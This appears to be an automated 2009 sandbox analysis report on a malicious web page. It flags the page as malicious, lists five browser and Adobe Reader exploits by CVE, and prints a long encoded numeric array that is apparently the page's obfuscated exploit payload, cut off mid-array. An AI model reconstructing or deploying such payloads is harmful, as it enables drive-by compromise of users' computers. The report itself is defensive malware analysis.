Analysis report for http://dmitrygaiduk.cn/show.php?s=1893da9ce4
Sample Overview
| URL | http://dmitrygaiduk.cn/show.php?s=1893da9ce4 |
|---|---|
| MD5 | 7049447b1560e567bb3965572ae17556 |
| Analysis Started | 2009-09-10 04:48:35 |
| Report Generated | 2009-09-10 04:48:58 |
| Jsand version | 1.03.02 |
See the report for domain dmitrygaiduk.cn.
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|---|---|
| Office Snapshot Viewer | The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine | CVE-2008-2463 |
| Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659 |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
| MsVidCtl Overflow | Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter | CVE-2008-0015 |
Deobfuscation results
Evals
- (repeated 1 time)
var jnoxy = [187, 226, 189, 189, 187, 175, 212, 195, 141, 146, 194, 172, 169, 208, 158, 189, 119, 131, 194, 188, 198, 199, 141, 193, 191, 184, 131, 211, 202, 217, 187, 149, 187, 184, 222, 208, 223, 180, 203, 132, 180, 202, 204, 141, 144, 189, 187, 175, 219, 186, 197, 158, 188, 177, 171, 200, 201, 149, 113, 167, 186, 190, 210, 193, 159, 125, 178, 148, 146, 173, 169, 193, 159, 124, 112, 129, 226, 184, 206, 195, 189, 175, 110, 202, 126, 232, 195, 204, 192, 193, 215, 186, 222, 140, 200, 172, 189, 133, 150, 208, 195, 195, 189, 171, 189, 164, 207, 185, 191, 170, 186, 141, 119, 186, 184, 189, 185, 181, 216, 196, 211, 195, 136, 159, 147, 177, 157, 193, 163, 170, 105, 111, 160, 210, 208, 176, 206, 170, 174, 141, 186, 150, 202, 206, 185, 191, 224, 199, 210, 192, 151, 181, 171, 220, 117, 197, 156, 166, 143, 186, 217, 197, 191, 180, 203, 188, 171, 216, 201, 149, 120, 149, 196, 169, 198, 201, 208, 183, 130, 172, 111, 224, 210, 234, 204, 100, 176, 172, 141, 199, 210, 192, 151, 132, 180, 218, 193, 217, 120, 204, 172, 186, 218, 199, 219, 111, 192, 168, 178, 216, 186, 168, 193, 191, 184, 116, 212, 197, 210, 189, 130, 105, 141, 170, 169, 143, 123, 124, 118, 185, 205, 196, 228, 125, 202, 175, 182, 164, 188, 210, 195, 185, 168, 176, 198, 205, 170, 128, 128, 185, 131, 135, 128, 186, 176, 206, 175, 116, 215, 182, 219, 179, 201, 180, 110, 142, 129, 211, 176, 198, 186, 171, 142, 144, 223, 180, 203, 117, 185, 202, 195, 209, 119, 200, 188, 178, 209, 126, 168, 184, 192, 111, 184, 202, 198, 155, 193, 191, 186, 182, 212, 195, 224, 180, 174, 172, 190, 217, 146, 170, 113, 139, 105, 111, 224, 199, 210, 195, 207, 185, 180, 133, 201, 223, 196, 191, 130, 195, 202, 193, 224, 180, 213, 185, 171, 217, 202, 223, 189, 122, 173, 167, 209, 200, 210, 138, 215, 196, 80, 203, 202, 219, 178, 206, 176, 181, 211, 117, 176, 190, 199, 183, 178, 202, 201, 210, 119, 131, 194, 185, 202, 201, 193, 184, 199, 172, 181, 218, 201, 149, 118, 198, 182, 169, 198, 201, 214, 190, 200, 117, 174, 215, 186, 211, 111, 151, 103, 104, 205, 201, 225, 191, 148, 118, 117, 209, 190, 207, 125, 204, 188, 117, 188, 154, 175, 156, 155, 154, 154, 170, 167, 156, 193, 201, 169, 181, 217, 200, 155, 195, 210, 187, 104, 140, 129, 158, 127, 138, 119, 118, 142, 144, 234, 89, 192, 188, 180, 200, 201, 214, 190, 200, 103, 170, 206, 199, 210, 178, 206, 186, 174, 212, 204, 149, 120, 213, 189, 167, 215, 117, 224, 183, 191, 179, 178, 200, 196, 209, 180, 151, 188, 180, 202, 200, 208, 176, 202, 172, 110, 135, 122, 226, 146, 138, 122, 121, 138, 202, 165, 145, 144, 123, 107, 218, 136, 157, 131, 138, 108, 187, 149, 152, 164, 135, 127, 188, 122, 149, 141, 175, 116, 207, 127, 136, 149, 152, 146, 196, 139, 138, 125, 149, 122, 226, 135, 156, 136, 138, 138, 202, 157, 135, 143, 127, 107, 218, 133, 166, 148, 156, 108, 187, 153, 133, 165, 145, 127, 188, 126, 169, 136, 161, 116, 207, 126, 137, 153, 133, 146, 196, 143, 127, 126, 167, 122, 226, 133, 155, 122, 137, 138, 202, 162, 144, 142, 123, 107, 218, 154, 159, 147, 139, 108, 187, 170, 135, 159, 145, 127, 188, 139, 168, 141, 175, 116, 207, 123, 140, 170, 151, 146, 196, 143, 121, 123, 166, 122, 226, 148, 155, 127, 121, 138, 202, 165, 136, 143, 125, 107, 218, 133, 161, 132, 143, 108, 187, 154, 140, 162, 133, 127, 188, 125, 152, 141, 175, 116, 207, 127, 136, 152, 152, 146, 196, 141, 122, 125, 153, 122, 226, 127, 141, 126, 126, 138, 202, 162, 133, 160, 122, 107, 218, 140, 163, 135, 156, 108, 187, 149, 136, 159, 127, 127, 188, 121, 152, 155, 160, 116, 207, 123, 127, 168, 142, 146, 196, 142, 120, 123, 149, 122, 226, 130, 141, 136, 138, 138, 202, 160, 133, 160, 141, 107, 218, 151, 178, 127, 160, 108, 187, 149, 136, 158, 131, 127, 188, 140, 151, 136, 165, 116, 207, 119, 126, 156, 137, 146, 196, 157, 141, 137, 150, 122, 226, 127, 141, 119, 138, 138, 202, 161, 127, 160, 136, 107, 218, 154, 179, 148, 156, 108, 187, 152, 151, 162, 135, 127, 188, 125, 154, 155, 165, 116, 207, 124, 139, 170, 138, 146, 196, 142, 125, 126, 167, 122, 226, 127, 141, 121, 122, 138, 202, 163, 133, 157, 122, 107, 218, 133, 176, 135, 156, 108, 187, 157, 151, 161, 135, 127, 188, 119, 168, 138, 163, 116, 207, 139, 121, 149, 136, 146, 196, 138, 123, 126, 167, 122, 226, 127, 141, 127, 135, 138, 202, 162, 149, 157, 122, 107, 218, 138, 157, 132, 159, 108, 187, 157, 153, 176, 130, 127, 188, 118, 157, 140, 177, 116, 207, 124, 120, 154, 140, 146, 196, 141, 122, 136, 157, 122, 226, 135, 155, 138, 135, 138, 202, 178, 135, 143, 137, 107, 218, 155, 179, 144, 140, 108, 187, 171, 155, 179, 149, 127, 188, 137, 149, 136, 159, 116, 207, 141, 125, 157, 151, 146, 196, 155, 140, 140, 151, 122, 226, 145, 146, 123, 140, 138, 202, 159, 148, 144, 124, 107, 218, 140, 165, 133, 143, 108, 187, 155, 139, 174, 145, 127, 188, 124, 155, 142, 165, 116, 207, 122, 121, 166, 151, 146, 196, 156, 127, 137, 149, 122, 226, 133, 142, 125, 119, 138, 202, 157, 127, 138, 119, 107, 218, 139, 165, 132, 138, 108, 187, 155, 141, 162, 131, 127, 188, 124, 154, 140, 159, 116, 207, 121, 122, 152, 138, 146, 196, 144, 128, 119, 168, 122, 226, 132, 138, 126, 122, 138, 202, 162, 130, 143, 123, 107, 218, 150, 174, 145, 146, 108, 187, 149, 153, 179, 146, 127, 188, 140, 171, 140, 176, 116, 207, 119, 122, 154, 138, 146, 196, 160, 127, 126, 167, 122, 226, 146, 142, 127, 121, 138, 202, 175, 127, 138, 138, 107, 218, 141, 174, 133, 157, 108, 187, 158, 141, 178, 127, 127, 188, 124, 157, 138, 157, 116, 207, 125, 139, 155, 155, 146, 196, 144, 123, 120, 170, 122, 226, 134, 143, 125, 126, 138, 202, 163, 146, 145, 121, 107, 218, 138, 161, 133, 158, 108, 187, 157, 154, 175, 135, 127, 188, 118, 170, 137, 178, 116, 207, 141, 140, 170, 152, 146, 196, 138, 123, 123, 154, 122, 226, 132, 138, 128, 121, 138, 202, 176, 127, 141, 122, 107, 218, 138, 157, 132, 138, 108, 187, 157, 151, 162, 133, 127, 188, 118, 153, 138, 162, 116, 207, 138, 120, 157, 136, 146, 196, 146, 122, 125, 171, 122, 226, 131, 157, 138, 120, 138, 202, 162, 127, 143, 121, 107, 218, 136, 163, 145, 146, 108, 187, 151, 155, 158, 144, 127, 188, 140, 171, 140, 157, 116, 207, 119, 122, 154, 138, 146, 196, 143, 126, 123, 167, 122, 226, 145, 146, 124, 124, 138, 202, 179, 148, 147, 127, 107, 218, 133, 178, 135, 155, 108, 187, 154, 138, 179, 149, 127, 188, 124, 166, 133, 161, 116, 207, 141, 140, 149, 133, 146, 196, 144, 127, 138, 156, 122, 226, 134, 142, 126, 122, 138, 202, 160, 144, 145, 119, 107, 218, 135, 179, 129, 160, 108, 187, 155, 153, 163, 131, 127, 188, 125, 153, 139, 166, 116, 207, 126, 127, 156, 135, 146, 196, 144, 120, 124, 156, 122, 226, 133, 142, 125, 127, 138, 202, 163, 145, 145, 124, 107, 218, 139, 160, 129, 159, 108, 187, 151, 155, 163, 148, 127, 188, 124, 156, 139, 159, 116, 207, 125, 138, 155, 150, 146, 196, 145, 120, 125, 149, 122, 226, 130, 140, 126, 127, 138, 202, 163, 132, 140, 140, 107, 218, 139, 162, 134, 146, 108, 187, 149, 133, 157, 127, 124, 112, 129, 219, 182, 223, 111, 188, 176, 173, 199, 193, 220, 178, 197, 132, 187, 211, 186, 224, 178, 187, 183, 171, 141, 119, 146, 196, 147, 119, 127, 149, 122, 226, 136, 138, 128, 118, 135, 126, 168, 197, 187, 185, 102, 205, 186, 206, 179, 191, 185, 185, 206, 207, 210, 140, 140, 119, 129, 219, 182, 223, 111, 205, 179, 167, 200, 192, 224, 191, 187, 170, 171, 162, 189, 210, 176, 190, 172, 184, 216, 190, 231, 180, 133, 186, 174, 202, 193, 217, 178, 201, 171, 171, 147, 193, 210, 189, 193, 187, 174, 160, 204, 213, 184, 198, 172, 110, 199, 190, 212, 177, 198, 182, 169, 208, 131, 217, 180, 200, 174, 186, 205, 145, 224, 187, 187, 170, 177, 216, 197, 206, 178, 191, 112, 168, 206, 188, 207, 187, 201, 170, 177, 144, 146, 207, 184, 193, 169, 178, 212, 184, 216, 138, 208, 168, 184, 133, 187, 214, 187, 198, 169, 178, 212, 184, 216, 140, 188, 176, 173, 199, 193, 220, 178, 197, 117, 185, 218, 183, 224, 195, 204, 176, 180, 204, 125, 157, 123, 205, 179, 167, 200, 192, 224, 191, 187, 170, 171, 142, 144, 227, 176, 204, 103, 168, 209, 196, 208, 186, 151, 169, 175, 204, 183, 217, 190, 189, 178, 116, 216, 202, 207, 194, 206, 185, 175, 211, 188, 149, 127, 134, 169, 175, 204, 183, 217, 190, 189, 178, 116, 209, 186, 219, 182, 206, 175, 115, 216, 193, 206, 178, 197, 186, 182, 198, 184, 210, 120, 149, 190, 174, 206, 193, 210, 119, 188, 179, 181, 200, 192, 155, 187, 191, 181, 173, 217, 189, 152, 194, 198, 168, 169, 208, 200, 221, 176, 189, 172, 130, 149, 205, 160, 127, 138, 119, 118, 142, 208, 207, 187, 201, 170, 177, 162, 183, 217, 190, 189, 178, 113, 199, 193, 220, 178, 197, 114, 172, 206, 193, 217, 177, 198, 182, 169, 208, 144, 234, 89, 208, 168, 184, 133, 194, 210, 188, 201, 185, 191, 162, 195, 210, 198, 122, 136, 184, 215, 182, 230, 119, 131, 130, 172, 212, 199, 149, 197, 187, 185, 102, 206, 146, 157, 138, 195, 131, 121, 149, 133, 168, 184, 133, 114, 111, 224, 194, 210, 188, 201, 185, 191, 192, 190, 202, 140, 188, 179, 181, 200, 192, 152, 194, 194, 172, 178, 209, 184, 220, 179, 191, 130, 195, 111, 201, 223, 200, 213, 189, 167, 215, 117, 220, 177, 196, 132, 170, 212, 184, 226, 188, 191, 181, 186, 147, 184, 223, 180, 187, 187, 171, 170, 193, 210, 188, 191, 181, 186, 141, 124, 220, 177, 196, 172, 169, 217, 124, 150, 138, 190, 182, 169, 218, 194, 210, 189, 206, 117, 168, 212, 185, 230, 125, 187, 183, 182, 202, 195, 209, 146, 194, 176, 178, 201, 125, 220, 177, 196, 112, 129, 212, 183, 215, 125, 209, 176, 170, 217, 189, 170, 118, 139, 110, 129, 212, 183, 215, 125, 194, 172, 175, 204, 189, 225, 140, 129, 120, 109, 160, 196, 207, 185, 136, 171, 167, 217, 182, 170, 118, 136, 118, 170, 204, 195, 155, 184, 202, 174, 109, 160, 196, 207, 185, 136, 170, 178, 198, 200, 224, 184, 190, 132, 109, 200, 193, 224, 184, 190, 129, 118, 158, 138, 162, 144, 157, 125, 120, 146, 151, 179, 129, 159, 116, 122, 168, 151, 174, 124, 155, 121, 136, 158, 130, 174, 133, 141, 141, 125, 156, 135, 177, 131, 144, 138, 140, 140, 144, 224, 180, 206, 155, 175, 210, 186, 220, 196, 206, 111, 182, 201, 187, 149, 120, 134, 124, 118, 149, 126, 168, 204, 189, 168, 186, 200, 189, 149, 180, 131, 194, 182, 201, 187, 149, 120, 149, 196, 195, 111, 187, 226, 189, 189, 187, 175, 212, 195, 141, 191, 190, 173, 110, 142, 208, 227, 176, 204, 103, 175, 216, 158, 219, 194, 206, 168, 178, 209, 186, 209, 140, 192, 168, 178, 216, 186, 168, 184, 192, 111, 180, 198, 203, 214, 182, 187, 187, 181, 215, 131, 221, 187, 207, 174, 175, 211, 200, 147, 117, 200, 168, 188, 206, 188, 206, 195, 201, 185, 116, 213, 193, 226, 182, 195, 181, 185, 147, 193, 210, 189, 193, 187, 174, 142, 208, 211, 190, 204, 111, 188, 198, 199, 141, 199, 151, 119, 129, 221, 145, 219, 176, 208, 176, 173, 198, 201, 220, 193, 136, 183, 178, 218, 188, 214, 189, 205, 117, 178, 202, 195, 212, 195, 194, 130, 190, 144, 128, 150, 202, 195, 173, 110, 211, 182, 227, 184, 193, 168, 186, 212, 199, 155, 191, 198, 188, 173, 206, 195, 224, 170, 210, 164, 116, 201, 186, 224, 178, 204, 176, 182, 217, 190, 220, 189, 136, 176, 180, 201, 186, 229, 158, 192, 111, 109, 166, 185, 220, 177, 191, 103, 135, 200, 199, 220, 177, 187, 187, 109, 142, 118, 170, 124, 139, 112, 193, 206, 200, 182, 189, 205, 187, 167, 209, 193, 210, 179, 151, 187, 184, 218, 186, 168, 177, 204, 172, 167, 208, 144, 234, 89, 195, 173, 110, 211, 182, 227, 184, 193, 168, 186, 212, 199, 155, 191, 198, 188, 173, 206, 195, 224, 170, 210, 164, 116, 201, 186, 224, 178, 204, 176, 182, 217, 190, 220, 189, 136, 176, 180, 201, 186, 229, 158, 192, 111, 109, 166, 185, 220, 177, 191, 103, 150, 169, 155, 148, 120, 123, 132, 115, 150, 126, 232, 184, 205, 144, 180, 216, 201, 206, 187, 198, 172, 170, 162, 201, 223, 196, 191, 130, 168, 215, 186, 206, 186, 149, 196, 195, 226, 186, 217, 194, 191, 103, 175, 203, 125, 228, 184, 200, 171, 181, 220, 131, 174, 178, 206, 176, 188, 202, 173, 188, 177, 196, 172, 169, 217, 126, 232, 197, 187, 185, 102, 200, 196, 219, 195, 204, 182, 178, 162, 195, 226, 187, 198, 130, 186, 215, 206, 232, 178, 201, 181, 186, 215, 196, 217, 140, 200, 172, 189, 133, 150, 208, 195, 195, 189, 171, 189, 164, 207, 185, 191, 170, 186, 141, 124, 174, 178, 204, 182, 150, 169, 155, 155, 159, 158, 141, 109, 142, 144, 234, 178, 187, 187, 169, 205, 125, 210, 120, 213, 196, 80, 206, 187, 149, 112, 189, 182, 180, 217, 199, 220, 187, 131, 194, 186, 215, 206, 232, 178, 201, 181, 186, 215, 196, 217, 140, 200, 172, 189, 133, 150, 208, 195, 195, 189, 171, 189, 164, 207, 185, 191, 170, 186, 141, 124, 189, 147, 160, 117, 150, 201, 187, 176, 195, 204, 179, 109, 142, 144, 234, 178, 187, 187, 169, 205, 125, 210, 120, 213, 196, 195, 111, 190, 211, 119, 189, 182, 180, 217, 199, 220, 187, 131, 194, 175, 216, 158, 219, 194, 206, 168, 178, 209, 186, 209, 140, 206, 185, 187, 202, 144, 234, 204, 100, 176, 172, 141, 190, 224, 152, 200, 186, 186, 198, 193, 217, 180, 190, 112, 193, 219, 182, 223, 111, 207, 168, 131, 211, 182, 227, 184, 193, 168, 186, 212, 199, 155, 196, 205, 172, 184, 166, 188, 210, 189, 206, 117, 186, 212, 161, 220, 198, 191, 185, 137, 198, 200, 210, 119, 131, 130, 175, 203, 125, 226, 176, 136, 176, 180, 201, 186, 229, 158, 192, 111, 104, 203, 190, 223, 180, 192, 182, 190, 135, 126, 142, 140, 135, 120, 111, 224, 203, 206, 193, 122, 171, 174, 221, 206, 170, 179, 201, 170, 187, 210, 186, 219, 195, 136, 170, 184, 202, 182, 225, 180, 159, 179, 171, 210, 186, 219, 195, 130, 110, 171, 210, 183, 210, 179, 129, 112, 129, 201, 189, 229, 200, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 186, 184, 200, 124, 153, 118, 136, 118, 167, 201, 189, 217, 190, 204, 189, 191, 147, 197, 209, 181, 129, 112, 129, 201, 189, 229, 200, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 175, 184, 202, 187, 148, 123, 129, 117, 117, 198, 185, 213, 187, 201, 185, 188, 222, 131, 221, 179, 192, 110, 111, 160, 185, 213, 199, 211, 117, 185, 202, 201, 174, 195, 206, 185, 175, 199, 202, 225, 180, 130, 110, 186, 222, 197, 210, 118, 134, 110, 167, 213, 197, 217, 184, 189, 168, 186, 206, 196, 219, 126, 202, 171, 172, 140, 126, 168, 179, 194, 191, 191, 147, 200, 210, 195, 155, 187, 186, 215, 190, 207, 196, 206, 172, 110, 140, 204, 214, 179, 206, 175, 109, 145, 135, 157, 127, 131, 130, 170, 205, 205, 230, 125, 205, 172, 186, 166, 201, 225, 193, 195, 169, 187, 217, 186, 149, 118, 194, 172, 175, 204, 189, 225, 118, 134, 121, 118, 149, 126, 168, 179, 194, 191, 191, 147, 200, 210, 195, 155, 187, 186, 215, 190, 207, 196, 206, 172, 110, 140, 200, 225, 200, 198, 172, 109, 145, 124, 209, 184, 205, 183, 178, 198, 206, 167, 189, 201, 181, 171, 160, 124, 150, 138, 190, 182, 169, 218, 194, 210, 189, 206, 117, 168, 212, 185, 230, 125, 187, 183, 182, 202, 195, 209, 146, 194, 176, 178, 201, 125, 209, 183, 210, 192, 111, 160, 210, 210, 187, 205, 172, 193, 219, 182, 223, 111, 190, 175, 190, 222, 146, 209, 190, 189, 188, 179, 202, 195, 225, 125, 189, 185, 171, 198, 201, 210, 148, 198, 172, 179, 202, 195, 225, 119, 129, 176, 172, 215, 182, 218, 180, 129, 112, 129, 201, 189, 229, 200, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 186, 184, 200, 124, 153, 118, 136, 118, 167, 201, 189, 217, 190, 204, 189, 191, 147, 197, 209, 181, 129, 112, 129, 201, 189, 229, 200, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 190, 175, 201, 201, 213, 118, 134, 121, 118, 149, 126, 168, 179, 194, 191, 191, 147, 200, 210, 195, 155, 187, 186, 215, 190, 207, 196, 206, 172, 110, 140, 189, 210, 184, 193, 175, 186, 140, 129, 159, 127, 138, 112, 129, 201, 189, 229, 200, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 186, 186, 222, 193, 210, 118, 134, 110, 170, 206, 200, 221, 187, 187, 192, 128, 211, 196, 219, 180, 149, 110, 111, 160, 185, 220, 178, 207, 180, 171, 211, 201, 155, 177, 201, 171, 191, 147, 182, 221, 191, 191, 181, 170, 168, 189, 214, 187, 190, 111, 170, 205, 205, 230, 120, 149, 196, 80, 216, 186, 225, 163, 195, 180, 171, 212, 202, 225, 119, 192, 179, 167, 216, 189, 149, 120, 134, 120, 123, 149, 133, 150, 138, 204, 172, 186, 218, 199, 219, 138, 215, 81, 172, 209, 182, 224, 183, 130, 112, 129, 215, 186, 225, 196, 204, 181, 129, 226, 95, 211, 196, 200, 170, 186, 206, 196, 219, 111, 192, 179, 167, 216, 189, 149, 120, 213, 189, 167, 215, 117, 189, 187, 187, 192, 171, 215, 171, 210, 193, 205, 176, 181, 211, 146, 200, 127, 134, 119, 114, 149, 178, 168, 184, 192, 111, 180, 198, 203, 214, 182, 187, 187, 181, 215, 131, 221, 187, 207, 174, 175, 211, 200, 147, 117, 200, 168, 188, 206, 188, 206, 195, 201, 185, 116, 210, 190, 218, 180, 174, 192, 182, 202, 200, 155, 187, 191, 181, 173, 217, 189, 150, 202, 208, 168, 184, 133, 205, 170, 189, 187, 189, 175, 204, 182, 225, 190, 204, 117, 182, 209, 202, 212, 184, 200, 186, 161, 135, 168, 213, 190, 189, 178, 189, 198, 203, 210, 111, 160, 179, 167, 216, 189, 143, 172, 149, 176, 172, 141, 205, 147, 117, 210, 117, 170, 202, 200, 208, 193, 195, 183, 186, 206, 196, 219, 120, 213, 151, 178, 198, 206, 210, 193, 176, 172, 184, 216, 190, 220, 189, 151, 191, 116, 201, 186, 224, 178, 204, 176, 182, 217, 190, 220, 189, 136, 185, 171, 213, 193, 206, 178, 191, 111, 117, 141, 176, 206, 124, 212, 136, 115, 191, 178, 233, 171, 205, 112, 113, 148, 129, 143, 113, 131, 117, 184, 202, 197, 217, 176, 189, 172, 110, 148, 125, 201, 194, 133, 185, 194, 193, 200, 152, 177, 181, 119, 115, 158, 178, 152, 120, 137, 115, 104, 147, 119, 150, 125, 205, 183, 178, 206, 201, 149, 113, 136, 105, 111, 160, 210, 234, 180, 198, 186, 171, 224, 201, 223, 200, 213, 189, 167, 215, 117, 211, 197, 151, 181, 171, 220, 117, 174, 178, 206, 176, 188, 202, 173, 188, 177, 196, 172, 169, 217, 125, 143, 162, 194, 182, 169, 208, 204, 206, 197, 191, 141, 178, 198, 200, 213, 125, 173, 175, 181, 200, 192, 228, 176, 208, 172, 140, 209, 182, 224, 183, 136, 126, 104, 142, 144, 214, 181, 130, 173, 188, 134, 146, 219, 196, 198, 179, 111, 224, 165, 217, 176, 211, 172, 184, 187, 186, 223, 194, 195, 182, 180, 162, 187, 227, 125, 161, 172, 186, 187, 182, 223, 184, 187, 169, 178, 202, 125, 143, 171, 126, 189, 171, 215, 200, 214, 190, 200, 105, 111, 147, 200, 221, 187, 195, 187, 110, 135, 117, 143, 120, 181, 120, 163, 147, 200, 221, 187, 195, 187, 110, 135, 129, 143, 120, 149, 196, 195, 200, 182, 225, 178, 194, 111, 171, 142, 208, 224, 189, 187, 183, 185, 205, 196, 225, 119, 131, 130, 184, 202, 201, 226, 193, 200, 130, 195, 226, 95, 227, 176, 204, 103, 188, 202, 199, 224, 184, 201, 181, 119, 162, 165, 217, 176, 211, 172, 184, 187, 186, 223, 194, 195, 182, 180, 192, 133, 202, 112, 151, 181, 187, 209, 193, 172, 191, 187, 185, 185, 202, 158, 219, 195, 130, 151, 178, 198, 206, 210, 193, 176, 172, 184, 216, 190, 220, 189, 181, 119, 163, 142, 143, 157, 138, 208, 168, 184, 133, 203, 210, 193, 205, 176, 181, 211, 135, 170, 159, 198, 168, 191, 202, 199, 195, 180, 204, 186, 175, 212, 195, 200, 128, 183, 104, 131, 211, 202, 217, 187, 153, 183, 167, 215, 200, 210, 152, 200, 187, 110, 181, 193, 206, 200, 191, 185, 156, 202, 199, 224, 184, 201, 181, 161, 150, 178, 150, 137, 138, 130, 188, 198, 199, 141, 197, 191, 185, 185, 206, 196, 219, 130, 151, 151, 178, 198, 206, 210, 193, 176, 172, 184, 216, 190, 220, 189, 181, 121, 163, 134, 146, 219, 196, 198, 179, 133, 213, 182, 223, 194, 191, 144, 180, 217, 125, 189, 187, 187, 192, 171, 215, 171, 210, 193, 205, 176, 181, 211, 176, 159, 172, 131, 129, 118, 160, 190, 211, 119, 208, 172, 184, 216, 190, 220, 189, 139, 132, 131, 158, 123, 147, 197, 191, 185, 185, 206, 196, 219, 130, 150, 120, 120, 153, 126, 232, 197, 187, 185, 102, 218, 182, 170, 189, 187, 189, 175, 204, 182, 225, 190, 204, 117, 187, 216, 186, 223, 144, 193, 172, 180, 217, 131, 225, 190, 166, 182, 189, 202, 199, 176, 176, 205, 172, 110, 142, 144, 214, 181, 130, 188, 167, 147, 190, 219, 179, 191, 191, 149, 203, 125, 143, 181, 195, 185, 171, 203, 196, 229, 113, 131, 104, 131, 146, 134, 150, 202, 208, 168, 184, 133, 200, 228, 181, 191, 179, 171, 210, 186, 219, 195, 151, 171, 181, 200, 202, 218, 180, 200, 187, 116, 200, 199, 210, 176, 206, 172, 139, 209, 186, 218, 180, 200, 187, 110, 140, 186, 218, 177, 191, 171, 109, 142, 144, 209, 190, 189, 188, 179, 202, 195, 225, 125, 188, 182, 170, 222, 131, 206, 191, 202, 172, 180, 201, 152, 213, 184, 198, 171, 110, 216, 204, 211, 180, 198, 172, 179, 202, 195, 225, 120, 149, 186, 189, 203, 186, 217, 180, 199, 172, 180, 217, 131, 228, 184, 190, 187, 174, 162, 124, 158, 118, 149, 186, 189, 203, 186, 217, 180, 199, 172, 180, 217, 131, 213, 180, 195, 174, 174, 217, 146, 148, 128, 129, 130, 185, 220, 187, 210, 187, 191, 180, 171, 211, 201, 155, 194, 204, 170, 131, 140, 131, 156, 188, 187, 181, 187, 198, 193, 155, 194, 209, 173, 109, 160, 200, 228, 181, 191, 179, 171, 210, 186, 219, 195, 136, 187, 191, 213, 186, 170, 118, 187, 183, 182, 209, 190, 208, 176, 206, 176, 181, 211, 132, 229, 124, 205, 175, 181, 200, 192, 228, 176, 208, 172, 115, 203, 193, 206, 194, 194, 110, 129, 226, 186, 217, 194, 191, 194, 188, 198, 199, 141, 194, 209, 173, 171, 209, 186, 218, 180, 200, 187, 131, 201, 196, 208, 196, 199, 172, 180, 217, 131, 208, 193, 191, 168, 186, 202, 154, 217, 180, 199, 172, 180, 217, 125, 148, 184, 192, 185, 167, 210, 186, 148, 120, 149, 186, 189, 203, 186, 217, 180, 199, 172, 180, 217, 131, 224, 180, 206, 136, 186, 217, 199, 214, 177, 207, 187, 171, 141, 124, 224, 193, 189, 110, 114, 140, 131, 156, 188, 187, 181, 187, 198, 193, 155, 194, 209, 173, 109, 142, 144, 224, 198, 192, 172, 178, 202, 194, 210, 189, 206, 117, 185, 202, 201, 174, 195, 206, 185, 175, 199, 202, 225, 180, 130, 110, 189, 206, 185, 225, 183, 129, 115, 120, 149, 133, 150, 138, 205, 190, 172, 202, 193, 210, 188, 191, 181, 186, 147, 200, 210, 195, 155, 187, 186, 215, 190, 207, 196, 206, 172, 110, 140, 189, 210, 184, 193, 175, 186, 140, 129, 159, 127, 138, 112, 129, 216, 204, 211, 180, 198, 172, 179, 202, 195, 225, 125, 205, 172, 186, 166, 201, 225, 193, 195, 169, 187, 217, 186, 149, 118, 205, 187, 191, 209, 186, 148, 123, 129, 171, 175, 216, 197, 217, 176, 211, 129, 180, 212, 195, 210, 138, 129, 112, 129, 201, 196, 208, 196, 199, 172, 180, 217, 131, 207, 190, 190, 192, 116, 198, 197, 221, 180, 200, 171, 137, 205, 190, 217, 179, 130, 186, 189, 203, 186, 217, 180, 199, 172, 180, 217, 126, 168, 204, 215, 81, 185, 211, 182, 221, 194, 194, 182, 186, 141, 126, 168, 204, 100, 173, 187, 211, 184, 225, 184, 201, 181, 102, 216, 195, 206, 191, 205, 175, 181, 217, 125, 150, 202, 208, 168, 184, 133, 205, 168, 197, 187, 185, 102, 212, 183, 215, 138, 208, 168, 184, 133, 194, 230, 178, 187, 185, 185, 162, 195, 210, 198, 122, 136, 184, 215, 182, 230, 119, 131, 130, 179, 222, 184, 206, 193, 205, 162, 118, 194, 146, 148, 178, 148, 118, 150, 215, 196, 212, 193, 187, 180, 102, 171, 190, 217, 180, 205, 118, 149, 218, 201, 217, 190, 201, 178, 102, 170, 205, 221, 193, 191, 186, 185, 148, 204, 206, 177, 136, 172, 190, 202, 124, 168, 188, 211, 170, 167, 215, 200, 200, 128, 183, 132, 109, 201, 143, 156, 159, 204, 182, 173, 215, 182, 218, 111, 160, 176, 178, 202, 200, 156, 158, 207, 187, 178, 212, 196, 216, 111, 159, 191, 182, 215, 186, 224, 194, 137, 190, 167, 199, 131, 210, 199, 191, 110, 129, 210, 206, 208, 176, 204, 186, 161, 151, 178, 170, 118, 191, 129, 117, 181, 199, 220, 182, 204, 168, 179, 133, 155, 214, 187, 191, 186, 117, 180, 202, 225, 187, 201, 182, 177, 133, 154, 229, 191, 204, 172, 185, 216, 132, 228, 176, 188, 117, 171, 221, 186, 148, 138, 206, 185, 191, 224, 203, 206, 193, 122, 182, 168, 207, 146, 219, 180, 209, 103, 135, 200, 201, 214, 197, 191, 159, 149, 199, 191, 210, 178, 206, 111, 109, 216, 195, 221, 197, 209, 117, 153, 211, 182, 221, 194, 194, 182, 186, 133, 171, 214, 180, 209, 172, 184, 133, 152, 220, 189, 206, 185, 181, 209, 131, 158, 118, 131, 130, 195, 200, 182, 225, 178, 194, 111, 171, 142, 208, 225, 193, 211, 194, 188, 198, 199, 141, 190, 188, 177, 131, 201, 196, 208, 196, 199, 172, 180, 217, 131, 208, 193, 191, 168, 186, 202, 154, 217, 180, 199, 172, 180, 217, 125, 148, 190, 188, 177, 171, 200, 201, 148, 120, 149, 182, 168, 207, 131, 224, 180, 206, 136, 186, 217, 199, 214, 177, 207, 187, 171, 141, 124, 208, 187, 187, 186, 185, 206, 185, 148, 123, 129, 170, 178, 216, 190, 209, 137, 160, 119, 139, 153, 135, 177, 132, 138, 116, 121, 155, 141, 176, 124, 139, 120, 138, 149, 130, 174, 147, 146, 120, 115, 149, 133, 174, 127, 157, 128, 118, 169, 152, 165, 147, 147, 110, 111, 160, 196, 207, 